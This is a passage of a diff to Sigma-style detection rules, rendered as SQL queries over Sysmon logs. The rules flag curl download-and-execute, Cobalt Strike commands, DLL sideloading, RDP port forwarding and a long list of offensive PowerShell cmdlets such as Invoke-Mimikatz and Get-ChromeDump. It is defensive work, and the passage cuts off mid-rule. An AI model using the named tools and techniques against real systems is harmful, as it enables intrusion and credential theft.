"21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE 